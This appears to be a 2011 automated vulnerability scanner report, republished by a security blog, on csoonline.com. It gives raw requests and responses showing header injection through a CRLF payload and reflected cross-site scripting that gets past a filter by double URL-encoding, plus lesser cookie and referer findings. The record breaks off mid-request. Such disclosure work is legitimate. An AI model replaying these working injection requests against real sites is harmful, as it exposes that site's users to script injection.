csoonline.com, XSS, HTTP Header Injection, CWE-79, CWE-113

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Mon Feb 28 07:25:12 CST 2011.


Loading

1. HTTP header injection

2. Cross-site scripting (reflected)

3. Session token in URL

3.1. http://www.csoonline.com/article/486324/security-tools-templates-policies

3.2. http://www.csoonline.com/solution-centers/ncircle

4. Cross-domain Referer leakage

5. Cross-domain script include

5.1. http://www.csoonline.com/article/486324/security-tools-templates-policies

5.2. http://www.csoonline.com/solution-centers/ncircle

6. Cookie without HttpOnly flag set

6.1. http://www.csoonline.com/article/486324

6.2. http://www.csoonline.com/article/486324/security-tools-templates-policies

6.3. http://www.csoonline.com/documents/flash/cso_partners_sm_3.swf

6.4. http://www.csoonline.com/elqNow/elqOPG.js

6.5. http://www.csoonline.com/favicon.ico

6.6. http://www.csoonline.com/js/doubleclick_ads.js

6.7. http://www.csoonline.com/js/sharing.js

6.8. http://www.csoonline.com/module.htm

6.9. http://www.csoonline.com/solution-centers/ncircle

6.10. http://www.csoonline.com/styles/article.css

6.11. http://www.csoonline.com/styles/channel.css

6.12. http://www.csoonline.com/styles/cso.css

6.13. http://www.csoonline.com/styles/general.css

6.14. http://www.csoonline.com/styles/global.css

6.15. http://www.csoonline.com/styles/global_nav.css

6.16. http://www.csoonline.com/styles/homepage.css

6.17. http://www.csoonline.com/styles/insider.css

6.18. http://www.csoonline.com/styles/modules.css

6.19. http://www.csoonline.com/styles/solutions_center.css

7. Content type incorrectly stated



1. HTTP header injection  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /article/486324

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a1f89%0d%0a768de21f1d5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /article/486324?a1f89%0d%0a768de21f1d5=1 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; NSC_djp.dpn=44593ca03660; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 12:46:15 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5
=1
Content-Length: 132
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5=1">here</a>

2. Cross-site scripting (reflected)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /module.htm

Issue detail

The value of the leadTaxonomy request parameter is copied into the HTML document as plain text between tags. The payload ccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450 was submitted in the leadTaxonomy parameter. This input was echoed as ccca8<img src=a onerror=alert(1)>c68746d9450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the leadTaxonomy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /module.htm?moduleType=article_comments&contentId=486324&taxonomyId=41193&leadTaxonomy=securityccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450&ajax=true&outputFormat=json HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
X-Prototype-Version: 1.5.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:28 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:02:10 GMT;path=/
Cache-Control: private
Content-Length: 1771

{"comments":"<link href=\"http:\/\/comments.csoonline.com\/themes\/CIO.com\/style.css\" rel=\"stylesheet\" type=\"text\/css\" media=\"screen\" \/><a id=\"comment\"><\/a>\n<a id=\"comment-10368\"><\/
...[SNIP]...
<a href=\"http:\/\/comments.csoonline.com\/node\/486324&topic=securityccca8<img src=a onerror=alert(1)>c68746d9450\">
...[SNIP]...

3. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://www.csoonline.com/article/486324/security-tools-templates-policies  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.csoonline.com
Path:   /article/486324/security-tools-templates-policies

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /article/486324/security-tools-templates-policies HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:31 GMT;path=/
Cache-Control: private
Content-Length: 68626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>
...[SNIP]...

3.2. http://www.csoonline.com/solution-centers/ncircle  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.csoonline.com
Path:   /solution-centers/ncircle

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.ncircle.com/index.php?s=solution_cso
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:31 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:00:11 GMT;path=/
Cache-Control: private
Content-Length: 27473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>
...[SNIP]...

4. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /solution-centers/ncircle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.ncircle.com/index.php?s=solution_cso
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:31 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:00:11 GMT;path=/
Cache-Control: private
Content-Length: 27473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<![endif]-->    <link rel="help" href="http://www.csoonline/help/" title="CSO&#174; | Customer Service." />
   <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/18704/nodetag.js"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idgt.data.cso/data_collection_cso;sz=1x1;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/idgt.data.cso/data_collection_cso;sz=1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<li><a href="http://www.omeda.com/cgi-win/cso.cgi?add" target="_blank" name="&lpos=Overview Nav:Subtopic">Subscribe</a>
...[SNIP]...
<li><a href="http://www.omeda.com/custsrv/cso/" target="_blank" name="&lpos=Overview Nav:Subtopic">Subscriber Services</a>
...[SNIP]...
</form>
               <script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_005964914320811651291:udjy26klife"></script>
...[SNIP]...
<noscript>
<iframe align="center" style="background-color:#FFFFFF; padding:0; margin:0px 0; width:965px; *width: 962px; height:1725px;"
       marginheight="0" marginwidth="0" frameborder="0" onload='scrollit();    '
       src="http://zones.computerworld.com/ncircle/?from=cso&src=csozne">

</iframe>
...[SNIP]...
<noscript>
    <a href="http://ad.doubleclick.net/jump/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe" target="_blank" style="border:none"><img src="http://ad.doubleclick.net/ad/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe" border="0" height="90" width="728" /></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.omeda.com/cgi-win/cso.cgi?add">Subscribe to CSO Magazine</a>
...[SNIP]...
<li><a href="http://www.cfoworld.com/?source=csofooter" target="_blank">CFOworld</a>
...[SNIP]...
<li><a href="http://www.cio.com?source=csofooter" target="_blank">CIO</a>
...[SNIP]...
<li><a href="http://www.computerworld.com?source=csofooter" target="_blank">Computerworld</a>
...[SNIP]...
<li><a href="http://www.demo.com" target="_blank">DEMO</a>
...[SNIP]...
<li><a href="http://www.gamepro.com" target="_blank">GamePro</a>
...[SNIP]...
<li><a href="http://www.games.net" target="_blank">Games.net</a>
...[SNIP]...
<li><a href="http://www.idc.com" target="_blank">IDC</a>
...[SNIP]...
<li><a href="http://www.idg.com" target="_blank">IDG</a>
...[SNIP]...
<li><a href="http://www.idgconnect.com" target="_blank">IDG Connect</a>
...[SNIP]...
<li><a href="http://www.idgknowledgehub.com" target="_blank">IDG Knowledge Hub</a>
...[SNIP]...
<li><a href="http://www.idgtechnetwork.com" target="_blank">IDG TechNetwork</a>
...[SNIP]...
<li><a href="http://www.idgventures.com" target="_blank">IDG Ventures</a>
...[SNIP]...
<li><a href="http://www.infoworld.com?source=csofooter" target="_blank">InfoWorld</a>
...[SNIP]...
<li><a href="http://www.itwhitepapers.com/index.php?source=csofooter" target="_blank">ITwhitepapers</a>
...[SNIP]...
<li><a href="http://www.itworld.com?source=csofooter" target="_blank">ITworld</a>
...[SNIP]...
<li><a href="http://www.javaworld.com?source=csofooter" target="_blank">JavaWorld</a>
...[SNIP]...
<li><a href="http://www.linuxworld.com?source=csofooter" target="_blank">LinuxWorld</a>
...[SNIP]...
<li><a href="http://www.macworld.com" target="_blank">Macworld</a>
...[SNIP]...
<li><a href="http://www.nwfusion.com?source=csofooter" target="_blank">Network World</a>
...[SNIP]...
<li><a href="http://www.pcworld.com" target="_blank">PC World</a>
...[SNIP]...
<div id="copyright">
               &#169;&nbsp;1994 - 2011&nbsp;CXO Media Inc. a subsidiary of <a rel="nofollow" href="http://www.idgenterprise.com/">IDG Enterprise</a>
...[SNIP]...
<div>

<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-203426h&amp;cg=0&amp;cc=1&amp;ts=noscript"

width="1" height="1" alt="" />


</div>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.csoonline.com/article/486324/security-tools-templates-policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /article/486324/security-tools-templates-policies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/486324/security-tools-templates-policies HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:31 GMT;path=/
Cache-Control: private
Content-Length: 68626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/18704/nodetag.js"></script>
...[SNIP]...
</form>
               <script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_005964914320811651291:udjy26klife"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://wd.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<div id="resource_center">

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACE&num=3&layt=1&fmt=simp"></script>
...[SNIP]...

5.2. http://www.csoonline.com/solution-centers/ncircle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /solution-centers/ncircle

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.ncircle.com/index.php?s=solution_cso
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:31 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:00:11 GMT;path=/
Cache-Control: private
Content-Length: 27473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/18704/nodetag.js"></script>
...[SNIP]...
</form>
               <script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_005964914320811651291:udjy26klife"></script>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 19 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://www.csoonline.com/article/486324  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /article/486324

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/486324 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; NSC_djp.dpn=44593ca03660; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 12:45:49 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/article/486324/security-tools-templates-policies
Content-Length: 111
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:30 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/article/486324/security-tools-templates-policies">here</a>

6.2. http://www.csoonline.com/article/486324/security-tools-templates-policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /article/486324/security-tools-templates-policies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/486324/security-tools-templates-policies HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
